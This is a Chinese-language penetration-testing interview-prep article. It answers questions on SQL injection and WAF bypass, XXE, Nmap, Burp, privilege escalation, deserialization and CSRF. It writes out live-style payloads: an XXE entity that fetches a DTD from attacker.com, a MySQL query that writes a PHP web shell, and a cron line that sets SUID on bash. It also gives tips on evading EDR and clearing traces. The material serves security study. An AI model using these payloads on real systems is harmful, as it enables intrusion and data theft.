安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[1. 自我介绍](#1. 自我介绍)
[2. OWASP Top 10 最熟漏洞](#2. OWASP Top 10 最熟漏洞)
[3. SQL注入全解](#3. SQL注入全解)
[4. XXE深度剖析](#4. XXE深度剖析)
[5. 完整渗透思路](#5. 完整渗透思路)
[6. Nmap高阶参数](#6. Nmap高阶参数)
[7. BurpSuite核心模块](#7. BurpSuite核心模块)
[8. 内网渗透第一步](#8. 内网渗透第一步)
[9. SQL写Shell方法](#9. SQL写Shell方法)
[10. 提权方式与实操](#10. 提权方式与实操)
[11. 命令执行函数](#11. 命令执行函数)
[12. 反序列化漏洞](#12. 反序列化漏洞)
[13. CSRF攻防全解](#13. CSRF攻防全解)
1、自我介绍 2、owasp top10 漏洞你最熟悉那些 3、请下sql注入原理 ,盲注常用那些函数,绕waf的手段有那些 4、XXE原理,XXE实现过程,XXE页面没有回显怎么解决,XXE可以getshell不 5、完整的渗透思路 6、你知道Nmap那些参数 (三次握手是用哪个参数) 7、BURP 常用的模块 8、知道内网渗透吗?拿到webshell入侵内网第一步该干什么 9、sql如何写shell 10、知道那些提权的方式,怎么提权的 10、命令执行常用函数 11、反序列化函数,java反序列化 用那些类 12、CSRF 原理 怎么防御 ,渗透思路 平时怎么挖漏洞的
1. 自我介绍
模板结构 :
"我是[姓名],专注渗透测试领域[X]年。擅长Web漏洞挖掘 (SQL注入/反序列化/SSRF)和内网渗透,独立开发过[工具名称]等自动化工具。在SRC平台提交高危漏洞[X]个,熟悉MSF、BurpSuite等工具链,主导完成[某项目]的攻防演练。期望在贵司深入实战攻防研究。"
2. OWASP Top 10 最熟漏洞
漏洞类型 掌握深度 实战案例 注入漏洞 SQL/命令注入原理、绕过、工具开发 利用时间盲注获取管理员凭证 失效访问控制 水平/垂直越权漏洞挖掘 绕过JWT验证实现未授权API访问 SSRF 协议利用(Gopher/Dict)、绕过技巧 通过SSRF读取AWS元数据获取AK/SK XXE 外部实体注入、OOB数据外带 无回显XXE利用DNSLog提取敏感文件
3. SQL注入全解
mermaid`graph TB A[SQL注入原理] --> B[用户输入拼接SQL语句] B --> C[恶意构造查询逻辑] C --> D[数据库执行非预期操作]`
- 盲注关键函数 :
SUBSTR()
、ASCII()
、SLEEP()
、IF()
、BENCHMARK()
- 绕WAF 6种手段 :
- 注释混淆:
/*!SELECT*/
- 字符串编码:
CHAR(65,66,67)
- 等价函数替换:
mid() → substr()
- 空白符变异:
%0a/%09
替代空格- 参数污染:
id=1&id=2 union select 1,2
- 分块传输编码(Chunked)
4. XXE深度剖析
原理:解析外部实体时加载恶意内容
实现过程 :
xml`<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]> <data>&xxe;</data>`
无回显解决方案 :
xml`<!ENTITY % dtd SYSTEM "http://attacker.com/evil.dtd"> %dtd; <!-- 触发DNS/HTTP请求外带数据 -->`
GetShell可能性 :
✅ 条件:存在expect://
协议或可写目录 + PHP环境
xml`<!ENTITY xxe SYSTEM "expect://id"> `
5. 完整渗透思路
mermaid`flowchart LR A[信息收集] --> B[漏洞扫描] B --> C[漏洞利用] C --> D[权限提升] D --> E[内网横向] E --> F[痕迹清理]`
- 关键动作 :
- 信息收集:子域名/端口/框架指纹
- 漏洞利用:优先尝试高风险漏洞组合(如SQLi+文件写入)
- 权限维持:内存马 > Webshell
- 内网渗透:利用MSF的
psexec
模块横向移动
6. Nmap高阶参数
参数 作用 示例 -sS
TCP SYN扫描(半开) nmap -sS 192.168.1.1
-sV
服务版本探测 nmap -sV -p 80,443
-O
操作系统识别 nmap -O 10.0.0.1
-A
全面扫描(含脚本探测) nmap -A target.com
--script
调用NSE脚本 nmap --script vuln
🔐 三次握手扫描 :
-sS
(SYN扫描不建立完整连接)
7. BurpSuite核心模块
模块 用途 Proxy 流量拦截/修改 Repeater 请求重放测试 Intruder 自动化爆破(SQLi/XSS等) Scanner 自动漏洞扫描(需Pro版) Collaborator 检测无回显漏洞(SSRF/XXE)
8. 内网渗透第一步
核心动作:
bash`# 信息收集三步曲 whoami /all # 当前权限 ipconfig /all # 网络拓扑 netstat -ano # 开放端口&内网服务 `
⚠️ 注意事项:
- 立即隐藏进程(迁移到合法进程内存)
- 建立加密隧道(SSH/DNS隧道)
- 避免触发EDR监控
9. SQL写Shell方法
MySQL示例:
sql`SELECT '<?php system($_GET[cmd]); ?>' INTO OUTFILE '/var/www/html/shell.php' -- 需满足条件:FILE权限 + secure_file_priv为空 `
10. 提权方式与实操
系统 提权方式 命令示例 Windows 内核漏洞(CVE-2023-21716) msfvenom -p windows/...
服务漏洞(AlwaysInstallElevated) msiexec /i evil.msi
Linux SUID滥用 find / -perm -4000 2>/dev/null
定时任务劫持 echo "chmod +s /bin/bash" >> /etc/cron.hourly
11. 命令执行函数
语言 高危函数 PHP system()
,exec()
,passthru()
,shell_exec()
Java Runtime.exec()
,ProcessBuilder()
Python os.system()
,subprocess.Popen()
12. 反序列化漏洞
Java反序列化利用链:
mermaid`graph LR A[入口类] --> B[ObjectInputStream.readObject] B --> C[恶意类(如InvokerTransformer)] C --> D[Runtime.exec执行命令]`
- 常用Gadget链 :
CommonsCollections3/4、Fastjson、Jackson
13. CSRF攻防全解
原理:诱导用户触发恶意请求(如转账链接)
防御方案 :
html`<!-- 服务端生成Token --> <input type="hidden" name="csrf_token" value="RANDOM_STRING"> `
渗透挖掘技巧 :
- 检查关键操作(改密/支付)是否验证Referer
- 测试Token是否可预测/复用
- 结合XSS绕过Token验证(DOM型XSS+CSRF组合利用)
漏洞挖掘方法论
mermaid`pie title 漏洞发现途径占比 "黑盒扫描" : 40 "手工逻辑测试" : 30 "源码审计" : 20 "协议分析" : 10 `
- 高效挖洞策略 :
- 专注业务逻辑漏洞(如订单金额篡改)
- 跟踪新框架漏洞(如Log4j/Spring相关)
- 利用自动化工具(Burp插件 + 自研爬虫)